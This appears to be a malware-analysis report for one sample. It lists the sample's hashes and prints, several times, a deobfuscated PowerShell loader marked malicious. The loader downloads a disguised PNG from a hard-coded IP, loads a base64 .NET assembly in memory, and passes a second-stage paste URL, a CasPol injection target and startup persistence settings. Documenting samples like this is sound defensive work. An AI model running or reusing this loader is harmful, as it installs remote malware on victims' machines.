|
Hash | Hash Value |
|---|---|
| MD5 | 630a39ded9e4e76a999171ce3cf09961
|
| Sha1 | f10ac9b96d3a853fc989dead5b013bfb6aab0113
|
| Sha256 | fd842c505db96c6967b882917002e649df2d889043686c1e0664ee95839660a7
|
| Sha384 | 1aa55ace4007edfde3aa5a92a684b622b6f93aa515d217e3df3989d03cd35d74de2b56674200d2046e4a58c8cd66c922
|
| Sha512 | c13cf58341fd1eb35b1ae1e67faedafb86f6233846ce89faaa64ab854a69ff7b6d0be44c4b673ec407e8a810526388e13d53e5d2ef73711ea32c2512e6c3e111
|
| SSDeep | 12:0C2LgyaISW5bcqYr1FOCeSgpkAqxd3pjl2hKFg7uS0aLJqiNVUh6C5HapJPULzBT:0RLwccRROkTxl2hSa0+jUAC9qeLzBbUe
|
| TLSH | 7D01105A4809CF19CF8D73A778AF6A4C88A0179F0019FEF0F3A99C64D30D9E184560B7
|
|
Name0 | Value |
|---|---|
| Deobfuscated PowerShell | $wc = New-Object "Net.WebClient" $wc."Encoding" = [Encoding]::"UTF8" $null = ($wc."DownloadString"("http://172.245.4.220/img/optimized_MSI.png") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "0hHduUjZhZTYhVjNmdDZ30SN 3QGOtU2YyQTL5Y2Mh1SM0AjZxgTMl9ydhJ3LlR3chB3Lt92YuEGdzFGcn9Gbuc3d39yL6MHc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "C:\Users\Public\Downloads", "RvfdKMRSNw", "CasPol", "", "CasPol", "", "https://pastefy.app/q4icoput/raw", "C:\Users\Public\Downloads", "RvfdKMRSNw", "vbs", "1", "", "dpeqgyPkky", "0", "startup_onstart") } )) |
| Deobfuscated PowerShell | $wc = New-Object "Net.WebClient" $wc."Encoding" = [Encoding]::"UTF8" $null = ($wc."DownloadString"("http://172.245.4.220/img/optimized_MSI.png") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "0hHduUjZhZTYhVjNmdDZ30SN 3QGOtU2YyQTL5Y2Mh1SM0AjZxgTMl9ydhJ3LlR3chB3Lt92YuEGdzFGcn9Gbuc3d39yL6MHc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "C:\Users\Public\Downloads", "RvfdKMRSNw", "CasPol", "", "CasPol", "", "https://pastefy.app/q4icoput/raw", "C:\Users\Public\Downloads", "RvfdKMRSNw", "vbs", "1", "", "dpeqgyPkky", "0", "startup_onstart") } )) |
|
Name0 | Value | Location |
|---|---|---|
| Deobfuscated PowerShell | $wc = New-Object "Net.WebClient" $wc."Encoding" = [Encoding]::"UTF8" $null = ($wc."DownloadString"("http://172.245.4.220/img/optimized_MSI.png") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "0hHduUjZhZTYhVjNmdDZ30SN 3QGOtU2YyQTL5Y2Mh1SM0AjZxgTMl9ydhJ3LlR3chB3Lt92YuEGdzFGcn9Gbuc3d39yL6MHc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "C:\Users\Public\Downloads", "RvfdKMRSNw", "CasPol", "", "CasPol", "", "https://pastefy.app/q4icoput/raw", "C:\Users\Public\Downloads", "RvfdKMRSNw", "vbs", "1", "", "dpeqgyPkky", "0", "startup_onstart") } )) Malicious |
630a39ded9e4e76a999171ce3cf09961 |
| Deobfuscated PowerShell | $wc = New-Object "Net.WebClient" $wc."Encoding" = [Encoding]::"UTF8" $null = ($wc."DownloadString"("http://172.245.4.220/img/optimized_MSI.png") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "0hHduUjZhZTYhVjNmdDZ30SN 3QGOtU2YyQTL5Y2Mh1SM0AjZxgTMl9ydhJ3LlR3chB3Lt92YuEGdzFGcn9Gbuc3d39yL6MHc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "C:\Users\Public\Downloads", "RvfdKMRSNw", "CasPol", "", "CasPol", "", "https://pastefy.app/q4icoput/raw", "C:\Users\Public\Downloads", "RvfdKMRSNw", "vbs", "1", "", "dpeqgyPkky", "0", "startup_onstart") } )) Malicious |
630a39ded9e4e76a999171ce3cf09961 > [Deobfuscated PS] |